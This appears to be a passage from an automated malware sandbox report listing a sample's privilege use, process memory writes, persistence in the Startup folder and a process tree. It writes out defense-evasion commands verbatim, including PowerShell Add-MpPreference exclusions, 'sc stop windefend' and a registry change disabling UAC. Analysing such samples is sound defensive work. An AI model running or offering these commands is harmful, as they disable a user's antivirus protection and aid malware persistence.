N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\AdvancedRun.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\sc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\AdvancedRun.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\AdvancedRun.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: 33 N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: 33 N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\AdvancedRun.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\AdvancedRun.exe N/A
Token: 33 N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: 33 N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: 33 N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: 33 N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: 33 N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: 33 N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: 33 N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\AdvancedRun.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\AdvancedRun.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2320 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe
PID 2320 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe
PID 2320 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe
PID 5100 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe
PID 5100 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe
PID 5100 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe
PID 2320 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\system32\sc.exe
PID 2320 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\system32\sc.exe
PID 2320 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\system32\sc.exe
PID 2320 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
PID 2320 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
PID 2320 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
PID 2320 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe
PID 868 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe
PID 868 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe
PID 2320 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\cmd.exe
PID 2320 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\cmd.exe
PID 2320 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\cmd.exe
PID 4984 wrote to memory of 5452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 4984 wrote to memory of 5452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2404 wrote to memory of 5748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2404 wrote to memory of 5748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2404 wrote to memory of 5748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 868 wrote to memory of 5844 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 5844 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 5844 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 5884 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 5884 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 5884 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 5928 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 5928 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 5928 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 5996 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 5996 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 5996 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 6088 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 6088 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 6088 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 5432 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2320 wrote to memory of 5432 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2320 wrote to memory of 5432 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2320 wrote to memory of 5432 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2320 wrote to memory of 5432 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\EdgeBrowser.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\EdgeBrowser.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\EdgeBrowser.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe" /SpecialRun 4101d8 5100

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force

C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\test.bat"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 1

C:\Windows\system32\sc.exe

sc stop windefend

C:\Windows\SysWOW64\timeout.exe

timeout 1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

